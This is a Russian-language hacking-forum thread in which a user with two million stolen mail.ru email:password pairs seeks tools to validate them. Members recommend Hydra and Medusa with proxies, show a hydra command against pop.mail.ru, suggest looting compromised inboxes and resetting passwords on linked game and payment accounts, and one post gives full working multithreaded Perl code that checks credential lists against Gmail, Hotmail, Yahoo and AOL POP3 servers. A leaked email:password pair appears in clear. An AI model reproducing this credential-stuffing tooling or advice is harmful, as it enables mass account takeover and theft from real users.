Чем прочекать 2кк mail.ru?

Discussion in 'Уязвимости Mail-сервисов' started by Dr.Money, 6 Jan 2014.

  1. Dr.Money

    Dr.Money New Member

    Joined:
    5 Sep 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Сабж.
    Есть 2кк e-mail'ов на mail.ru. Чем их можно прочекать?
    Чем бы не пытался - срабатывает защита, и после 1000 попыток всё летит в БЭД.
    Может есть какой-нить брут многопоточный с проксями?
     
  2. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Вам проверить пары логин:пароль или только существование аккаунтов?
    Гидру ту же самую попробуйте.
     
  3. Dr.Money

    Dr.Money New Member

    Joined:
    5 Sep 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Проверить login;pass
    upd: гидра только под UNIX?
     
    #3 Dr.Money, 6 Jan 2014
    Last edited: 6 Jan 2014
  4. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Вы минимум третий человек, который за последние несколько дней спрашивает об этом. Идеологически - да. Может быть, они таки сделали какой-никакой порт на окна, я не знаю. Энивей, kali вам в помощь. Скачал -> записал -> запустил. А заодно можете рассмотреть на местный сборник актуальных брутов, наверняка там есть что-нибудь почто-специфичное.

    Но я бы все же рекомендовал вам заказать именно чекер, а не брут, и именно для mail.ru. Возможно, на веброжу. Если повезет - капча будет только после значительного количества невалидных mail:pass, и чекать можно будет хоть с одного айпи все 200k.
     
  5. Dr.Money

    Dr.Money New Member

    Joined:
    5 Sep 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Пробовал более 10 чекеров, и заканчивается их работоспособность после первой тысячи login:pass


    Гидра ругается:

    Code:
    C:\Users\admin>E:\download\hydra-7.3-windows\hydra-7.3\hydra.exe -C E:/2kk.tx
    t -o E:/log.txt -t 5 pop.mail.ru pop3
    Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-06 10:03:51
    cygwin warning:
      MS-DOS style path detected: E:/2kk.txt
      Preferred POSIX equivalent is: /cygdrive/e/2kk.txt
      CYGWIN environment variable option "nodosfilewarning" turns off this warning.
      Consult the user's guide for more details about POSIX paths:
        http://cygwin.com/cygwin-ug-net/using.html#using-pathnames
    [ERROR] invalid line in colon file (-C), missing colon in line: kelly_cutie_gurl
    @hotmail.comreineaerold
    
    C:\Users\admin>
    И строк не 200к, а 2000к (2 миллиона)
     
  6. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    912
    Likes Received:
    474
    Reputations:
    723
    Гидра - хня, пробуй медузу.
     
    _________________________
  7. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    А вы английский знаете? А про онлайн-переводчики слышали? Давайте, я вам переведу:
    После прочтения сообщения об ошибке здравый смысл подсказывает найти эту строку и вставить недостающее двоеточие: kelly_cutie_gurl@hotmail.com:reineaerold

    Вам бы базу сначала проверить на правильность формата. А заодно собрать статистику по доменам, посколько почему-то мне думается что упомянутый hotmail.com не принадлежит mail.ru
     
  8. Dr.Money

    Dr.Money New Member

    Joined:
    5 Sep 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Не сообразил. Спасибо, помогло.
    А в "-o указанный_файл.txt" пишутся гуды?
     
  9. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Согласно линуксовой доке - да. Весьма вероятно, в винде ключи не меняли.

    Хотите, чекер базы на валидность со статистикой напишу?
     
  10. Dr.Money

    Dr.Money New Member

    Joined:
    5 Sep 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Нет, пока не нужно, но спасибо.
    Ещё другой вопрос: если все содержимые в -o e-mail'ы уже заблокированы за рассылку спама, и для их реанимации необходимо сменить пароль и указать телефон.

    Что с такими e-mail'ами вообще можно сделать?
     
  11. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54

    Зависит от сервиса и жесткости блокировки. Если аккаунты не авторег и есть доступ к инбоксу: можете потрошить по аккаунтам всяких игрулек, платежек и прочего. Была где-то даже партнерка на эту тему. Я бы просто ради интереса слил с таких все отправленные и посмотрел бы на тему паролей и прочего.
     
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    В первом посте написано mail.ru, у них есть доступ в инбокс.
    Можно еще ретривить аккаунты нужных сайтов, зареганные на это мыло.
     
  13. CE/l/lEP

    CE/l/lEP New Member

    Joined:
    13 Dec 2011
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    smtp/pop+socks. Писал как - то под свои нужды подобное
     
  14. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Рестор паролей в данном контексте подходит под "потрошить" :)
     
  15. dshelyuzhak

    dshelyuzhak Member

    Joined:
    25 Oct 2012
    Messages:
    141
    Likes Received:
    7
    Reputations:
    1
    У Дикса есть софт для чека mail.ru (есть многопоточная)
    советую вам к нему обратиться.
     
  16. Serrg

    Serrg Elder - Старейшина

    Joined:
    25 Dec 2011
    Messages:
    93
    Likes Received:
    15
    Reputations:
    13
    Прочекать смысле на валидность ? если да то у меня завалялся чекер на perl очень шустрый без прокси, очень давно где то его брал уже не помню и автора тоже не помню.

    У меня чекает в 300 потоков максимум, 1000 аков в за 7 секунд.

    Когда сижу с usb modema то ставлю в 50 потоков и шустро работает и гуды не пропускает, вот сам код:

    Code:
    use warnings;
    use strict;
    
    use threads;
    use threads::shared;
    
    use IO::Socket;
    use IO::Socket::SSL;
    
    use Fcntl ':flock';
    
    ### Настройки
    
    my $accounts_file = 'ac.txt'; # Файл с аккаунтами
    my $accounts_delimiter = ':'; # Разделитель логина и пароля
    my $good_file = 'good.txt';
    my $bad_file = 'bad.txt';
    my $log_bad = 1;
    my $timeout = 60;
    my $threads_count = 10; # Количество потоков
    
    ### ---------
    
    my %servers = (
    'gmail.com' => {
    'port' => 995, 
    'ssl' => 1,
    'login_email' => 1
    },
    'hotmail.com' => {
    'host' => 'pop3.live.com', 
    'port' => 995, 
    'ssl' => 1,
    'login_email' => 1
    },
    'yahoo.com' => {
    'host' => 'plus.pop.mail.yahoo.com',
    'port' => 995, 
    'ssl' => 1
    },
    'aol.com' => {
    'port' => 995, 
    'ssl' => 1,
    'login_email' => 1
    }
    );
    
    my %statictis : shared = ('good' => 0, 'bad' => 0, 'error' => 0);
    my @threads = ();
    
    $| = 1;
    
    my @accounts : shared;
    (open FH, '<', $accounts_file) || die "[Error] Can't open $accounts_file: $!";
    push @accounts, $_ while <FH>;
    close FH;
    
    open FH, '>', $good_file;
    close FH;
    
    if ($log_bad) {
    open FH, '>', $bad_file;
    close FH;
    }
    
    sub thread_print {
    my ($str) = "@_ [thread ".threads->tid()."]";
    $str .= " " x (78 - length $str) if length $str < 79;
    print $str."\n";
    $str = '';
    $str .= "[ $_ - $statictis{$_} ]" for keys %statictis;
    print $str.'[threads: '.(scalar threads->list() + 1)."]\r";
    }
    
    sub check_account {
    while (1) {
    last if !@accounts;
    my $account = lc shift @accounts;
    chomp $account;
    if ($account =~ /([^@]+)@([^$accounts_delimiter]+)$accounts_delimiter(.+)/) {
    my ($login, $host, $password) = ($1, $2, $3);
    my $r_login = $login;
    my $sock;	
    if ($servers{$host}) {
    $r_login = "$login\@$host" if ${$servers{$host}}{'login_email'};
    if (${$servers{$host}}{'ssl'}) {
    eval { $sock = IO::Socket::SSL->new(PeerAddr => ((${$servers{$host}}{'host'}) ? ${$servers{$host}}{'host'} : "pop.$host"), Proto => 'tcp', PeerPort => ((${$servers{$host}}{'port'}) ? ${$servers{$host}}{'port'} : 110), Timeout => $timeout); };
    } else {
    eval { $sock = IO::Socket::INET->new(PeerAddr => ((${$servers{$host}}{'host'}) ? ${$servers{$host}}{'host'} : "pop.$host"), Proto => 'tcp', PeerPort => ((${$servers{$host}}{'port'}) ? ${$servers{$host}}{'port'} : 110), Timeout => $timeout); };
    }
    } else {
    eval{ $sock = IO::Socket::INET->new(PeerAddr => "pop.$host", Proto => 'tcp', PeerPort => 110, Timeout => $timeout);	};
    }
    if ($sock) {
    $sock->autoflush(1);
    my $answ;
    $answ = <$sock>;
    my $bad = 1; 
    if ($answ && substr($answ, 0, 1) eq '+') { 
    print $sock "USER $r_login\n"; 
    $answ = <$sock>;
    if ($answ && substr($answ, 0, 1) eq '+') { 
    print $sock "PASS $password\n";
    $answ = <$sock>;
    if ($answ && substr($answ, 0, 1) eq '+') {
    print $sock "QUIT\n"; 
    close $sock;
    $bad = 0;
    thread_print "[+] $login\@$host$accounts_delimiter$password"; 
    { lock %statictis; $statictis{'good'}++; } 
    open FH, '>>', $good_file;
    flock FH, LOCK_EX;
    print FH "$login\@$host$accounts_delimiter$password\n";
    flock FH, LOCK_UN;
    close FH;
    } elsif ($answ && $answ =~ /SYS\/PERM/) {
    $bad = 0;
    { lock %statictis; $statictis{'error'}++; } 
    thread_print "[~] $login\@$host$accounts_delimiter$password"; 
    }
    }
    }
    if ($bad) {
    thread_print "[-] $login\@$host$accounts_delimiter$password"; 
    { lock %statictis; $statictis{'bad'}++; } 
    if ($log_bad) {
    open FH, '>>', $bad_file;
    flock FH, LOCK_EX;
    print FH "$login\@$host$accounts_delimiter$password\n";
    flock FH, LOCK_UN;
    close FH;
    }
    }
    } else {
    { lock %statictis; $statictis{'error'}++; } 
    thread_print "[E] $login\@$host$accounts_delimiter$password #$?: $!";
    }
    }
    }
    threads->exit->detach;
    }
    
    $threads_count = $#accounts if $#accounts < $threads_count;
    $threads[$_] = threads->create(\&check_account) for 0..$threads_count - 1;
    $_->join for @threads;
    my $str;
    $str .= "[ $_ - $statictis{$_} ]" for keys %statictis;
    Я им чекнул 500 тысяч акков за час в 300 потоков
     
    #16 Serrg, 10 Jan 2014
    Last edited: 10 Jan 2014
    2 people like this.
  17. SoseD

    SoseD Member

    Joined:
    25 May 2012
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Платный онлайн чеккер. Не?
     
  18. Serrg

    Serrg Elder - Старейшина

    Joined:
    25 Dec 2011
    Messages:
    93
    Likes Received:
    15
    Reputations:
    13
    а зачем платный ?
     
  19. dumpersteam

    dumpersteam New Member

    Joined:
    9 Sep 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Как ты его в 300 потоков запускал?
    У меня выше 50 Perl закрывается с ошибкой. С чем это может быть связано?

    Загрузка процессора и памяти сразу под 100% и вылетает.
     
    #19 dumpersteam, 7 Feb 2014
    Last edited: 7 Feb 2014
  20. Serrg

    Serrg Elder - Старейшина

    Joined:
    25 Dec 2011
    Messages:
    93
    Likes Received:
    15
    Reputations:
    13
    У меня интернет через usb modem megafon симка билайн интернет скорость на выходе 3.6 мегабит, соответственно скорость загрузки ~360 kb/s скорость отправки примерно ~100 kb/s, 4,00 mb (ОЗУ) amd phenom 4 ядра 2.6 герц.

    Ничего необычного вроде, сначала ставил не более 10 потоков так как не знал и интернет был маленький dial, это было примерно года 2 назад, а теперь ~200-300 потоков ставлю когда надо много проверить много значит от 100 тысяч и всё окей. А так и в 100 потоков неплохо проверяет.) Все от инета зависит. Кстати разделитель ставить надо ":"

    Бывает еще такое что когда выкидывает с ошибкой, заново просто открываешь и уже нормально гонит и ошибок нету )

    [​IMG]

    Бывает такой что интернет отключается )) в 250 потоков если, ну это usb modem что с него взять ))
     
    #20 Serrg, 8 Feb 2014
    Last edited: 8 Feb 2014
Loading...